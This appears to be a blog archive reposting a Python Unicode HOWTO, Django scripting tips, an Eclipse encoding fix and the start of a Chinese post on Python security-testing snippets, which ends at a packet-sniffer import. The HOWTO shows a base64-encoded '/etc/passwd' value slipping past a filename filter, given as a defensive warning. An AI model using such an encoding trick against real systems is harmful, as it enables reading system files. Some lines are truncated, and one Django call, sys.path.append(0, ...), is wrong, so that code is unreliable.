Tuesday, November 4, 2008

Unicode|Setting Default Text File Encoding in Eclipse

Setting Default Text File Encoding in Eclipse

I was recently working with a set of SQL migration scripts in eclipse and started noticing that the localized characters weren't showing correctly. I've seen all kinds of chaos in my project with different file formats creeping into the sources and database. So I did a looking and found that Eclipse was defaulting to Cp1252 for the encoding. This is a pain and the cause of my files not displaying. So went into Window->Preferences... and Opened General->Workspace and changed the Text file encoding setting to UTF-8. Now all is good again.

Monday, November 3, 2008

Unicode|Screen Cast

http://farmdev.com/talks/unicode/

Sunday, November 2, 2008

Unicode|Common problem and resolution

UnicodeDecodeError: 'ascii' codec can't decode byte 0xa0 in position 10: ordinal not in range(128)

Jeff Epler jepler at unpythonic.net
Fri Oct 8 01:54:13 CEST 2004
If you compare a unicode string to a byte string, and the byte-string
has byte values >127, you will get an error like this:
>>> u'a' == '\xc0'
Traceback (most recent call last):
File "", line 1, in ?
UnicodeDecodeError: 'ascii' codec can't decode byte 0x80 in position 0: ordinal not in range(128)

There is no sensible way for Python to perform this comparison, because
the byte string '\xc0' could be in any encoding. If the encoding of the
byte string is latin-1, it's LATIN CAPITAL LETTER A WITH GRAVE. If it's
koi8-r encoded, it's CRYILLIC SMALL LETTER YU. Python refuses to guess
in this case.

It doesn't matter whether the unicode string contains any characters
that are non-ASCII characters.

To correct your function, you'll have to know what encoding the byte
string is in, and convert it to unicode using the decode() method,
and compare that result to the unicode string.

Jeff

Unicode|Unicode HOWTO

Unicode HOWTO

Version 1.02

This HOWTO discusses Python's support for Unicode, and explains various problems that people commonly encounter when trying to work with Unicode.

Introduction to Unicode

History of Character Codes

In 1968, the American Standard Code for Information Interchange, better known by its acronym ASCII, was standardized. ASCII defined numeric codes for various characters, with the numeric values running from 0 to 127. For example, the lowercase letter 'a' is assigned 97 as its code value.

ASCII was an American-developed standard, so it only defined unaccented characters. There was an 'e', but no 'é' or 'Í'. This meant that languages which required accented characters couldn't be faithfully represented in ASCII. (Actually the missing accents matter for English, too, which contains words such as 'naïve' and 'café', and some publications have house styles which require spellings such as 'coöperate'.)

For a while people just wrote programs that didn't display accents. I remember looking at Apple ][ BASIC programs, published in French-language publications in the mid-1980s, that had lines like these:

PRINT "FICHER EST COMPLETE."
PRINT "CARACTERE NON ACCEPTE."

Those messages should contain accents, and they just look wrong to someone who can read French.

In the 1980s, almost all personal computers were 8-bit, meaning that bytes could hold values ranging from 0 to 255. ASCII codes only went up to 127, so some machines assigned values between 128 and 255 to accented characters. Different machines had different codes, however, which led to problems exchanging files. Eventually various commonly used sets of values for the 128-255 range emerged. Some were true standards, defined by the International Standards Organization, and some were de facto conventions that were invented by one company or another and managed to catch on.

255 characters aren't very many. For example, you can't fit both the accented characters used in Western Europe and the Cyrillic alphabet used for Russian into the 128-255 range because there are more than 127 such characters.

You could write files using different codes (all your Russian files in a coding system called KOI8, all your French files in a different coding system called Latin1), but what if you wanted to write a French document that quotes some Russian text? In the 1980s people began to want to solve this problem, and the Unicode standardization effort began.

Unicode started out using 16-bit characters instead of 8-bit characters. 16 bits means you have 2^16 = 65,536 distinct values available, making it possible to represent many different characters from many different alphabets; an initial goal was to have Unicode contain the alphabets for every single human language. It turns out that even 16 bits isn't enough to meet that goal, and the modern Unicode specification uses a wider range of codes, 0-1,114,111 (0x10ffff in base-16).

There's a related ISO standard, ISO 10646. Unicode and ISO 10646 were originally separate efforts, but the specifications were merged with the 1.1 revision of Unicode.

(This discussion of Unicode's history is highly simplified. I don't think the average Python programmer needs to worry about the historical details; consult the Unicode consortium site listed in the References for more information.)

Definitions

A character is the smallest possible component of a text. 'A', 'B', 'C', etc., are all different characters. So are 'È' and 'Í'. Characters are abstractions, and vary depending on the language or context you're talking about. For example, the symbol for ohms (Ω) is usually drawn much like the capital letter omega (Ω) in the Greek alphabet (they may even be the same in some fonts), but these are two different characters that have different meanings.

The Unicode standard describes how characters are represented by code points. A code point is an integer value, usually denoted in base 16. In the standard, a code point is written using the notation U+12ca to mean the character with value 0x12ca (4810 decimal). The Unicode standard contains a lot of tables listing characters and their corresponding code points:

0061    'a'; LATIN SMALL LETTER A
0062 'b'; LATIN SMALL LETTER B
0063 'c'; LATIN SMALL LETTER C
...
007B '{'; LEFT CURLY BRACKET

Strictly, these definitions imply that it's meaningless to say 'this is character U+12ca'. U+12ca is a code point, which represents some particular character; in this case, it represents the character 'ETHIOPIC SYLLABLE WI'. In informal contexts, this distinction between code points and characters will sometimes be forgotten.

A character is represented on a screen or on paper by a set of graphical elements that's called a glyph. The glyph for an uppercase A, for example, is two diagonal strokes and a horizontal stroke, though the exact details will depend on the font being used. Most Python code doesn't need to worry about glyphs; figuring out the correct glyph to display is generally the job of a GUI toolkit or a terminal's font renderer.

Encodings

To summarize the previous section: a Unicode string is a sequence of code points, which are numbers from 0 to 0x10ffff. This sequence needs to be represented as a set of bytes (meaning, values from 0-255) in memory. The rules for translating a Unicode string into a sequence of bytes are called an encoding.

The first encoding you might think of is an array of 32-bit integers. In this representation, the string "Python" would look like this:

   P           y           t           h           o           n
0x50 00 00 00 79 00 00 00 74 00 00 00 68 00 00 00 6f 00 00 00 6e 00 00 00
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23

This representation is straightforward but using it presents a number of problems.

  1. It's not portable; different processors order the bytes differently.
  2. It's very wasteful of space. In most texts, the majority of the code points are less than 127, or less than 255, so a lot of space is occupied by zero bytes. The above string takes 24 bytes compared to the 6 bytes needed for an ASCII representation. Increased RAM usage doesn't matter too much (desktop computers have megabytes of RAM, and strings aren't usually that large), but expanding our usage of disk and network bandwidth by a factor of 4 is intolerable.
  3. It's not compatible with existing C functions such as strlen(), so a new family of wide string functions would need to be used.
  4. Many Internet standards are defined in terms of textual data, and can't handle content with embedded zero bytes.

Generally people don't use this encoding, choosing other encodings that are more efficient and convenient.

Encodings don't have to handle every possible Unicode character, and most encodings don't. For example, Python's default encoding is the 'ascii' encoding. The rules for converting a Unicode string into the ASCII encoding are simple; for each code point:

  1. If the code point is <128,>
  2. If the code point is 128 or greater, the Unicode string can't be represented in this encoding. (Python raises a UnicodeEncodeError exception in this case.)

Latin-1, also known as ISO-8859-1, is a similar encoding. Unicode code points 0-255 are identical to the Latin-1 values, so converting to this encoding simply requires converting code points to byte values; if a code point larger than 255 is encountered, the string can't be encoded into Latin-1.

Encodings don't have to be simple one-to-one mappings like Latin-1. Consider IBM's EBCDIC, which was used on IBM mainframes. Letter values weren't in one block: 'a' through 'i' had values from 129 to 137, but 'j' through 'r' were 145 through 153. If you wanted to use EBCDIC as an encoding, you'd probably use some sort of lookup table to perform the conversion, but this is largely an internal detail.

UTF-8 is one of the most commonly used encodings. UTF stands for "Unicode Transformation Format", and the '8' means that 8-bit numbers are used in the encoding. (There's also a UTF-16 encoding, but it's less frequently used than UTF-8.) UTF-8 uses the following rules:

  1. If the code point is <128,>
  2. If the code point is between 128 and 0x7ff, it's turned into two byte values between 128 and 255.
  3. Code points >0x7ff are turned into three- or four-byte sequences, where each byte of the sequence is between 128 and 255.

UTF-8 has several convenient properties:

  1. It can handle any Unicode code point.
  2. A Unicode string is turned into a string of bytes containing no embedded zero bytes. This avoids byte-ordering issues, and means UTF-8 strings can be processed by C functions such as strcpy() and sent through protocols that can't handle zero bytes.
  3. A string of ASCII text is also valid UTF-8 text.
  4. UTF-8 is fairly compact; the majority of code points are turned into two bytes, and values less than 128 occupy only a single byte.
  5. If bytes are corrupted or lost, it's possible to determine the start of the next UTF-8-encoded code point and resynchronize. It's also unlikely that random 8-bit data will look like valid UTF-8.

References

The Unicode Consortium site at <http://www.unicode.org> has character charts, a glossary, and PDF versions of the Unicode specification. Be prepared for some difficult reading. <http://www.unicode.org/history/> is a chronology of the origin and development of Unicode.

To help understand the standard, Jukka Korpela has written an introductory guide to reading the Unicode character tables, available at <http://www.cs.tut.fi/~jkorpela/unicode/guide.html>.

Roman Czyborra wrote another explanation of Unicode's basic principles; it's at <http://czyborra.com/unicode/characters.html>. Czyborra has written a number of other Unicode-related documentation, available from <http://www.cyzborra.com>.

Two other good introductory articles were written by Joel Spolsky <http://www.joelonsoftware.com/articles/Unicode.html> and Jason Orendorff <http://www.jorendorff.com/articles/unicode/>. If this introduction didn't make things clear to you, you should try reading one of these alternate articles before continuing.

Wikipedia entries are often helpful; see the entries for "character encoding" <http://en.wikipedia.org/wiki/Character_encoding> and UTF-8 <http://en.wikipedia.org/wiki/UTF-8>, for example.

Python's Unicode Support

Now that you've learned the rudiments of Unicode, we can look at Python's Unicode features.

The Unicode Type

Unicode strings are expressed as instances of the unicode type, one of Python's repertoire of built-in types. It derives from an abstract type called basestring, which is also an ancestor of the str type; you can therefore check if a value is a string type with isinstance(value, basestring). Under the hood, Python represents Unicode strings as either 16- or 32-bit integers, depending on how the Python interpreter was compiled.

The unicode() constructor has the signature unicode(string[, encoding, errors]). All of its arguments should be 8-bit strings. The first argument is converted to Unicode using the specified encoding; if you leave off the encoding argument, the ASCII encoding is used for the conversion, so characters greater than 127 will be treated as errors:

>>> unicode('abcdef')
u'abcdef'
>>> s = unicode('abcdef')
>>> type(s)

>>> unicode('abcdef' + chr(255))
Traceback (most recent call last):
File "", line 1, in ?
UnicodeDecodeError: 'ascii' codec can't decode byte 0xff in position 6:
ordinal not in range(128)

The errors argument specifies the response when the input string can't be converted according to the encoding's rules. Legal values for this argument are 'strict' (raise a UnicodeDecodeError exception), 'replace' (add U+FFFD, 'REPLACEMENT CHARACTER'), or 'ignore' (just leave the character out of the Unicode result). The following examples show the differences:

>>> unicode('\x80abc', errors='strict')
Traceback (most recent call last):
File "", line 1, in ?
UnicodeDecodeError: 'ascii' codec can't decode byte 0x80 in position 0:
ordinal not in range(128)
>>> unicode('\x80abc', errors='replace')
u'\ufffdabc'
>>> unicode('\x80abc', errors='ignore')
u'abc'

Encodings are specified as strings containing the encoding's name. Python 2.4 comes with roughly 100 different encodings; see the Python Library Reference at <http://docs.python.org/lib/standard-encodings.html> for a list. Some encodings have multiple names; for example, 'latin-1', 'iso_8859_1' and '8859' are all synonyms for the same encoding.

One-character Unicode strings can also be created with the unichr() built-in function, which takes integers and returns a Unicode string of length 1 that contains the corresponding code point. The reverse operation is the built-in ord() function that takes a one-character Unicode string and returns the code point value:

>>> unichr(40960)
u'\ua000'
>>> ord(u'\ua000')
40960

Instances of the unicode type have many of the same methods as the 8-bit string type for operations such as searching and formatting:

>>> s = u'Was ever feather so lightly blown to and fro as this multitude?'
>>> s.count('e')
5
>>> s.find('feather')
9
>>> s.find('bird')
-1
>>> s.replace('feather', 'sand')
u'Was ever sand so lightly blown to and fro as this multitude?'
>>> s.upper()
u'WAS EVER FEATHER SO LIGHTLY BLOWN TO AND FRO AS THIS MULTITUDE?'

Note that the arguments to these methods can be Unicode strings or 8-bit strings. 8-bit strings will be converted to Unicode before carrying out the operation; Python's default ASCII encoding will be used, so characters greater than 127 will cause an exception:

>>> s.find('Was\x9f')
Traceback (most recent call last):
File "", line 1, in ?
UnicodeDecodeError: 'ascii' codec can't decode byte 0x9f in position 3: ordinal not in range(128)
>>> s.find(u'Was\x9f')
-1

Much Python code that operates on strings will therefore work with Unicode strings without requiring any changes to the code. (Input and output code needs more updating for Unicode; more on this later.)

Another important method is .encode([encoding], [errors='strict']), which returns an 8-bit string version of the Unicode string, encoded in the requested encoding. The errors parameter is the same as the parameter of the unicode() constructor, with one additional possibility; as well as 'strict', 'ignore', and 'replace', you can also pass 'xmlcharrefreplace' which uses XML's character references. The following example shows the different results:

>>> u = unichr(40960) + u'abcd' + unichr(1972)
>>> u.encode('utf-8')
'\xea\x80\x80abcd\xde\xb4'
>>> u.encode('ascii')
Traceback (most recent call last):
File "", line 1, in ?
UnicodeEncodeError: 'ascii' codec can't encode character '\ua000' in position 0: ordinal not in range(128)
>>> u.encode('ascii', 'ignore')
'abcd'
>>> u.encode('ascii', 'replace')
'?abcd?'
>>> u.encode('ascii', 'xmlcharrefreplace')
'ꀀabcd޴'

Python's 8-bit strings have a .decode([encoding], [errors]) method that interprets the string using the given encoding:

>>> u = unichr(40960) + u'abcd' + unichr(1972)   # Assemble a string
>>> utf8_version = u.encode('utf-8') # Encode as UTF-8
>>> type(utf8_version), utf8_version
(, '\xea\x80\x80abcd\xde\xb4')
>>> u2 = utf8_version.decode('utf-8') # Decode using UTF-8
>>> u == u2 # The two strings match
True

The low-level routines for registering and accessing the available encodings are found in the codecs module. However, the encoding and decoding functions returned by this module are usually more low-level than is comfortable, so I'm not going to describe the codecs module here. If you need to implement a completely new encoding, you'll need to learn about the codecs module interfaces, but implementing encodings is a specialized task that also won't be covered here. Consult the Python documentation to learn more about this module.

The most commonly used part of the codecs module is the codecs.open() function which will be discussed in the section on input and output.

Unicode Literals in Python Source Code

In Python source code, Unicode literals are written as strings prefixed with the 'u' or 'U' character: u'abcdefghijk'. Specific code points can be written using the \u escape sequence, which is followed by four hex digits giving the code point. The \U escape sequence is similar, but expects 8 hex digits, not 4.

Unicode literals can also use the same escape sequences as 8-bit strings, including \x, but \x only takes two hex digits so it can't express an arbitrary code point. Octal escapes can go up to U+01ff, which is octal 777.

>>> s = u"a\xac\u1234\u20ac\U00008000"
^^^^ two-digit hex escape
^^^^^^ four-digit Unicode escape
^^^^^^^^^^ eight-digit Unicode escape
>>> for c in s: print ord(c),
...
97 172 4660 8364 32768

Using escape sequences for code points greater than 127 is fine in small doses, but becomes an annoyance if you're using many accented characters, as you would in a program with messages in French or some other accent-using language. You can also assemble strings using the unichr() built-in function, but this is even more tedious.

Ideally, you'd want to be able to write literals in your language's natural encoding. You could then edit Python source code with your favorite editor which would display the accented characters naturally, and have the right characters used at runtime.

Python supports writing Unicode literals in any encoding, but you have to declare the encoding being used. This is done by including a special comment as either the first or second line of the source file:

#!/usr/bin/env python
# -*- coding: latin-1 -*-

u = u'abcdé'
print ord(u[-1])

The syntax is inspired by Emacs's notation for specifying variables local to a file. Emacs supports many different variables, but Python only supports 'coding'. The -*- symbols indicate that the comment is special; within them, you must supply the name coding and the name of your chosen encoding, separated by ':'.

If you don't include such a comment, the default encoding used will be ASCII. Versions of Python before 2.4 were Euro-centric and assumed Latin-1 as a default encoding for string literals; in Python 2.4, characters greater than 127 still work but result in a warning. For example, the following program has no encoding declaration:

#!/usr/bin/env python
u = u'abcdé'
print ord(u[-1])

When you run it with Python 2.4, it will output the following warning:

amk:~$ python p263.py
sys:1: DeprecationWarning: Non-ASCII character '\xe9'
in file p263.py on line 2, but no encoding declared;
see http://www.python.org/peps/pep-0263.html for details

Unicode Properties

The Unicode specification includes a database of information about code points. For each code point that's defined, the information includes the character's name, its category, the numeric value if applicable (Unicode has characters representing the Roman numerals and fractions such as one-third and four-fifths). There are also properties related to the code point's use in bidirectional text and other display-related properties.

The following program displays some information about several characters, and prints the numeric value of one particular character:

import unicodedata

u = unichr(233) + unichr(0x0bf2) + unichr(3972) + unichr(6000) + unichr(13231)

for i, c in enumerate(u):
print i, '%04x' % ord(c), unicodedata.category(c),
print unicodedata.name(c)

# Get numeric value of second character
print unicodedata.numeric(u[1])

When run, this prints:

0 00e9 Ll LATIN SMALL LETTER E WITH ACUTE
1 0bf2 No TAMIL NUMBER ONE THOUSAND
2 0f84 Mn TIBETAN MARK HALANTA
3 1770 Lo TAGBANWA LETTER SA
4 33af So SQUARE RAD OVER S SQUARED
1000.0

The category codes are abbreviations describing the nature of the character. These are grouped into categories such as "Letter", "Number", "Punctuation", or "Symbol", which in turn are broken up into subcategories. To take the codes from the above output, 'Ll' means 'Letter, lowercase', 'No' means "Number, other", 'Mn' is "Mark, nonspacing", and 'So' is "Symbol, other". See <http://www.unicode.org/Public/UNIDATA/UCD.html#General_Category_Values> for a list of category codes.

References

The Unicode and 8-bit string types are described in the Python library reference at <http://docs.python.org/lib/typesseq.html>.

The documentation for the unicodedata module is at <http://docs.python.org/lib/module-unicodedata.html>.

The documentation for the codecs module is at <http://docs.python.org/lib/module-codecs.html>.

Marc-André Lemburg gave a presentation at EuroPython 2002 titled "Python and Unicode". A PDF version of his slides is available at <http://www.egenix.com/files/python/Unicode-EPC2002-Talk.pdf>, and is an excellent overview of the design of Python's Unicode features.

Reading and Writing Unicode Data

Once you've written some code that works with Unicode data, the next problem is input/output. How do you get Unicode strings into your program, and how do you convert Unicode into a form suitable for storage or transmission?

It's possible that you may not need to do anything depending on your input sources and output destinations; you should check whether the libraries used in your application support Unicode natively. XML parsers often return Unicode data, for example. Many relational databases also support Unicode-valued columns and can return Unicode values from an SQL query.

Unicode data is usually converted to a particular encoding before it gets written to disk or sent over a socket. It's possible to do all the work yourself: open a file, read an 8-bit string from it, and convert the string with unicode(str, encoding). However, the manual approach is not recommended.

One problem is the multi-byte nature of encodings; one Unicode character can be represented by several bytes. If you want to read the file in arbitrary-sized chunks (say, 1K or 4K), you need to write error-handling code to catch the case where only part of the bytes encoding a single Unicode character are read at the end of a chunk. One solution would be to read the entire file into memory and then perform the decoding, but that prevents you from working with files that are extremely large; if you need to read a 2Gb file, you need 2Gb of RAM. (More, really, since for at least a moment you'd need to have both the encoded string and its Unicode version in memory.)

The solution would be to use the low-level decoding interface to catch the case of partial coding sequences. The work of implementing this has already been done for you: the codecs module includes a version of the open() function that returns a file-like object that assumes the file's contents are in a specified encoding and accepts Unicode parameters for methods such as .read() and .write().

The function's parameters are open(filename, mode='rb', encoding=None, errors='strict', buffering=1). mode can be 'r', 'w', or 'a', just like the corresponding parameter to the regular built-in open() function; add a '+' to update the file. buffering is similarly parallel to the standard function's parameter. encoding is a string giving the encoding to use; if it's left as None, a regular Python file object that accepts 8-bit strings is returned. Otherwise, a wrapper object is returned, and data written to or read from the wrapper object will be converted as needed. errors specifies the action for encoding errors and can be one of the usual values of 'strict', 'ignore', and 'replace'.

Reading Unicode from a file is therefore simple:

import codecs
f = codecs.open('unicode.rst', encoding='utf-8')
for line in f:
print repr(line)

It's also possible to open files in update mode, allowing both reading and writing:

f = codecs.open('test', encoding='utf-8', mode='w+')
f.write(u'\u4500 blah blah blah\n')
f.seek(0)
print repr(f.readline()[:1])
f.close()

Unicode character U+FEFF is used as a byte-order mark (BOM), and is often written as the first character of a file in order to assist with autodetection of the file's byte ordering. Some encodings, such as UTF-16, expect a BOM to be present at the start of a file; when such an encoding is used, the BOM will be automatically written as the first character and will be silently dropped when the file is read. There are variants of these encodings, such as 'utf-16-le' and 'utf-16-be' for little-endian and big-endian encodings, that specify one particular byte ordering and don't skip the BOM.

Unicode filenames

Most of the operating systems in common use today support filenames that contain arbitrary Unicode characters. Usually this is implemented by converting the Unicode string into some encoding that varies depending on the system. For example, MacOS X uses UTF-8 while Windows uses a configurable encoding; on Windows, Python uses the name "mbcs" to refer to whatever the currently configured encoding is. On Unix systems, there will only be a filesystem encoding if you've set the LANG or LC_CTYPE environment variables; if you haven't, the default encoding is ASCII.

The sys.getfilesystemencoding() function returns the encoding to use on your current system, in case you want to do the encoding manually, but there's not much reason to bother. When opening a file for reading or writing, you can usually just provide the Unicode string as the filename, and it will be automatically converted to the right encoding for you:

filename = u'filename\u4500abc'
f = open(filename, 'w')
f.write('blah\n')
f.close()

Functions in the os module such as os.stat() will also accept Unicode filenames.

os.listdir(), which returns filenames, raises an issue: should it return the Unicode version of filenames, or should it return 8-bit strings containing the encoded versions? os.listdir() will do both, depending on whether you provided the directory path as an 8-bit string or a Unicode string. If you pass a Unicode string as the path, filenames will be decoded using the filesystem's encoding and a list of Unicode strings will be returned, while passing an 8-bit path will return the 8-bit versions of the filenames. For example, assuming the default filesystem encoding is UTF-8, running the following program:

fn = u'filename\u4500abc'
f = open(fn, 'w')
f.close()

import os
print os.listdir('.')
print os.listdir(u'.')

will produce the following output:

amk:~$ python t.py
['.svn', 'filename\xe4\x94\x80abc', ...]
[u'.svn', u'filename\u4500abc', ...]

The first list contains UTF-8-encoded filenames, and the second list contains the Unicode versions.

Tips for Writing Unicode-aware Programs

This section provides some suggestions on writing software that deals with Unicode.

The most important tip is:

Software should only work with Unicode strings internally, converting to a particular encoding on output.

If you attempt to write processing functions that accept both Unicode and 8-bit strings, you will find your program vulnerable to bugs wherever you combine the two different kinds of strings. Python's default encoding is ASCII, so whenever a character with an ASCII value >127 is in the input data, you'll get a UnicodeDecodeError because that character can't be handled by the ASCII encoding.

It's easy to miss such problems if you only test your software with data that doesn't contain any accents; everything will seem to work, but there's actually a bug in your program waiting for the first user who attempts to use characters >127. A second tip, therefore, is:

Include characters >127 and, even better, characters >255 in your test data.

When using data coming from a web browser or some other untrusted source, a common technique is to check for illegal characters in a string before using the string in a generated command line or storing it in a database. If you're doing this, be careful to check the string once it's in the form that will be used or stored; it's possible for encodings to be used to disguise characters. This is especially true if the input data also specifies the encoding; many encodings leave the commonly checked-for characters alone, but Python includes some encodings such as 'base64' that modify every single character.

For example, let's say you have a content management system that takes a Unicode filename, and you want to disallow paths with a '/' character. You might write this code:

def read_file (filename, encoding):
if '/' in filename:
raise ValueError("'/' not allowed in filenames")
unicode_name = filename.decode(encoding)
f = open(unicode_name, 'r')
# ... return contents of file ...

However, if an attacker could specify the 'base64' encoding, they could pass 'L2V0Yy9wYXNzd2Q=', which is the base-64 encoded form of the string '/etc/passwd', to read a system file. The above code looks for '/' characters in the encoded form and misses the dangerous character in the resulting decoded form.

References

The PDF slides for Marc-André Lemburg's presentation "Writing Unicode-aware Applications in Python" are available at <http://www.egenix.com/files/python/LSM2005-Developing-Unicode-aware-applications-in-Python.pdf> and discuss questions of character encodings as well as how to internationalize and localize an application.

Revision History and Acknowledgements

Thanks to the following people who have noted errors or offered suggestions on this article: Nicholas Bastin, Marius Gedminas, Kent Johnson, Ken Krugler, Marc-André Lemburg, Martin von Löwis, Chad Whitacre.

Version 1.0: posted August 5 2005.

Version 1.01: posted August 7 2005. Corrects factual and markup errors; adds several links.

Version 1.02: posted August 16 2005. Corrects factual errors.

Monday, October 27, 2008

Django|python path

Setting Django Environment Variables in a Python Script

Posted: July 15, 2007
Author: Scott Newman
Category: Python, Django

When running Python programs to interact with the Django API, you don't always have the PYTHONPATH and DJANGO_SETTINGS_MODULE defined.

Before I learned this trick, I used to put my programs inside shell scripts that exported the path and settings variables before running the program. Crude, but effective.

One important thing to remember: If you're using the Django API, you must put these steps in before you try to import any Django elements (views, models, etc.)

To set environment variables:

import os

os.environ['PYTHONPATH'] = '/home/code'
os.environ['DJANGO_SETTINGS_MODULE'] = 'myproject.settings'

To add locations to the search path:

import sys

sys.path.append(0, '/home/code')

You can view the search path and environment variables like this:

import sys, os

print sys.path
print os.environ.keys()

Further Reading

Dive Into Python, Chapter 2.4.1. The Import Search Path
http://www.diveintopython.org/getting_to_know_python/everything_is_an_object.html#d0e4550

Python Library Reference, Chapter 14.1.1 Process Parameters
http://docs.python.org/lib/os-procinfo.html

Django|Standalone Django scripts

Standalone Django scripts

An entry published by James Bennett on September 22, 2007, Part of the category Django. Nine comments posted.

In the grand tradition of providing answers to frequently-asked questions from the django-users mailing list and the #django IRC channel, I’d like to tackle something that’s fast becoming the most frequently-asked question: how do you write standalone scripts which make use of Django components?

At first glance, this isn’t a terribly hard thing to do: Django’s just plain Python, and all of its components can — in theory — be imported and used just like any other Python modules. But the thing that trips most people up is the need, in most parts of Django, to supply some settings Django can use so it’ll know things like which database to connect to, which applications are available, where it can find templates, etc.

Depending on exactly what you need to do, there are several ways you can approach this problem, so let’s run through each of them in turn.

Set DJANGO_SETTINGS_MODULE before you run

The simplest method is to simply assign a value to the DJANGO_SETTINGS_MODULE environment variable before you run your script, and that’s not terribly hard to do if you understand a little bit about how environment variables work. On most Unix-based systems (including Linux and Mac OS X), you can typically do this with the export command of the standard shell:

export DJANGO_SETTINGS_MODULE=yoursite.settings

Then you can just run any scripts which rely on Django settings, and they’ll work properly. If you’re using a different shell, or if you’re on Windows, the exact command to type will be slightly different, but the idea is the same.

One extremely useful application of this is in a crontab file; cron lets you set and change environment variables with ease, so you can have things like this in your crontab:

# Cron jobs for foo.com run at 3AM

DJANGO_SETTINGS_MODULE=foo.settings

0 3 * * * python /path/to/maintenance/script.py
30 3 * * * python /path/to/other/script.py

# Cron jobs for bar.com run at 4AM

DJANGO_SETTINGS_MODULE=bar.settings

0 4 * * * python /path/to/maintenance/script.py
30 4 * * * python /path/to/other/script.py

This is pretty much exactly what the crontab files on our servers at World Online look like, and in general this is the cleanest way to handle scripts which use Django components and need to run as cron jobs.

Use setup_environ()

Back in May, Jared Kuolt wrote up this technique, which is exactly how Django’s own manage.py script handles settings: the function setup_environ() in django.core.management will, given a Python module containing Django settings, handle all the business of (appropriately for its name) setting up your environment for you:

from django.core.management import setup_environ
from mysite import settings

setup_environ(settings)

Below the setup_environ() line, you can make use of any Django component and rest assured that the proper settings will be available for it.

The only real disadvantage to this is that you lose some flexibility: by tying the script to a particular settings module, you’re also tying it to a particular Django project, and if you later want to re-use it you’ll have to make a copy and change the import to point at another project’s settings file, or find a different way to configurably accept the settings to use (we’ll look at that again in a moment). If all you need is a one-off script for a particular project, though, this is an awfully handy way to set it up.

Use settings.configure()

For cases where you don’t want or need the overhead of a full Django settings file, Django provides a standalone method for configuring only the settings you need, and without needing to use DJANGO_SETTINGS_MODULE: the configure() method of the LazySettings class in django.conf (django.conf.settings is always an instance of LazySettings, which is used to ensure that settings aren’t accessed until they’re actually needed). There’s official documentation for this, and it’s fairly easy to follow along and use it in your own scripts:

from django.conf import settings

settings.configure(TEMPLATE_DIRS=('/path/to/template_dir',), DEBUG=False,
TEMPLATE_DEBUG=False)

And then below the configure() line you’d be able to make use of Django’s template system as normal (because the appropriate settings for it have been provided). This technique is also handy because for any “missing” settings you didn’t configure it will fill in automatic default values (see Django’s settings documentation for coverage of the default values for each setting), or you can pass a settings module in the default_settings keyword argument to configure() to provide your own custom defaults.

Like setup_environ(), this method does tie you down to a particular combination of settings, but again this isn’t necessarily a problem: it’s fairly common to have project-specific scripts which won’t need to be re-used and rely on some values particular to that project.

Accept settings on the command line

We’ve seen that setup_environ() and settings.configure() both seem to tie you to a particular settings module or combination of manually-provided settings, and while that’s not always a bad thing it presents a major stumbling block to reusable applications. Setting DJANGO_SETTINGS_MODULE (as seen above in the context of a crontab) is much more flexible, but can be somewhat tedious to do over and over again. So why don’t we come up with a method that lets you specify the settings to use when you call the script?

As it turns out, this is extremely easy to do; I think the technique doesn’t get a lot of attention because most newcomers to Django don’t yet know their way around Python’s standard library and so don’t stumble across the module which makes it all simple: optparse. In a nutshell, optparse provides an easy way to write scripts which take traditional Unix-style command line arguments, and to get those arguments translated into appropriate Python values.

A simple example would look like this:

import os
from optparse import OptionParser

usage = "usage: %prog -s SETTINGS | --settings=SETTINGS"
parser = OptionParser(usage)
parser.add_option('-s', '--settings', dest='settings', metavar='SETTINGS',
help="The Django settings module to use")
(options, args) = parser.parse_args()
if not options.settings:
parser.error("You must specify a settings module")

os.environ['DJANGO_SETTINGS_MODULE'] = options.settings

There’s a lot going on here in a very small amount of code, so let’s walk through it step-by-step:

  1. We import the standard os module and the OptionParser class from optparse.
  2. We set up a usage string; optparse will print this in help and error messages.
  3. We create an OptionParser with the usage string.
  4. We add an option to the OptionParser: the script will accept an argument, either as -s or as the long option settings, which will be stored in the value attribute “settings” of the parsed options, and we provide it with some explanatory text to show in help and error messages.
  5. We parse the arguments from the command line using parser.parse_args().
  6. We check to see that the “settings” argument was supplied, and direct the parser to throw an error if it wasn’t.
  7. We use os.environ to set DJANGO_SETTINGS_MODULE.

Not bad for about ten lines of easy-to-write code; once that’s been done, DJANGO_SETTINGS_MODULE will have been set and we can use any Django components we like. Running the script will look like this:

python myscript.py --settings=yoursite.settings

The parser created with optparse will handle the parsing; it’ll also automatically enable a “help” option for the -h or —help flags which will list all of the available options and their help text, and show appropriate error messages when the required “settings” argument isn’t supplied.

Because optparse makes it easy to pack a lot of configurability into a small amount of code, it’s generally my preferred method for writing standalone scripts which need to interact with Django, and I highly recommend spending some time with its official documentation. If you’d like to use one of the other configuration methods — setup_environ() or settings.configure() — it’s relatively easy to write an optparse-based script which does the right thing.

And that’s a wrap

Each of these methods is appropriate for different types of situations, and depending on exactly what you need to do you may end up using all of them at various times. Personally, I tend to either write scripts which use optparse and take a command-line argument for settings, or (for maintenance tasks which will run in cron) to write scripts which just assume DJANGO_SETTINGS_MODULE is taken care of in advance, but all of these methods can be useful, so keep them all in mind whenever you find yourself needing a standalone script that uses Django.

Sunday, October 26, 2008

Python|常用辅助安全测试6个代码例子

Python常用辅助安全测试6个代码例子


这些代码,大部分是从别处转来的。测试的时候会比较有用。比如数据嗅探,发送请求,正则表达式处理文件,注入测试等。
实际中可以根据自己的项目,进行一定程度的扩展。代码是简洁为主。这部分代码是偏重安全测试的。
学习python已经3月了。感觉非常有用。
前些天,pm还让我写一个程序辅助他办公。

近来发现很多公司也开始在自己的招聘职位上加上了python。
对于python。功能说的太多没有用,我发一些例子。
我也推荐大家有时间不妨学习一下。一天基本上就可以学会。
外国非常流行。我的pm是德国人,他们国家好像是直接学习python,就像咱们学习c一样普及。
国外搞python开发的人很多,公司也很多。国内的相对较少。
我学习这个,是为了辅助工作和玩hack。日常用也很强大。
google有个google app enginer,是个类似虚拟主机的服务。使用python开发web应用。
另外,google本身是基于python的。

大多数应用,都可以使用一个函数搞定,比如文件下载,发送请求,分析网页,读写xml,文件压缩,爬虫搜索。
这些应用绝大多数是跨平台的。可以在linux下运行。
ironpyhon是一个组合.net平台和python的工具,他们正在研究如何利用python把.net放在linux上运行。

诺基亚的手机也开始支持python编程。
java,.net 也开始提供python版本。

下面举些例子,演示一下python的功能。

1、数据嗅探,这个例子,是嗅探土豆网上的flash真正的播放地址。
import pcap ,struct , re
from pickle import dump,load
pack=pcap.pcap()
pack.setfilter('tcp port 80')
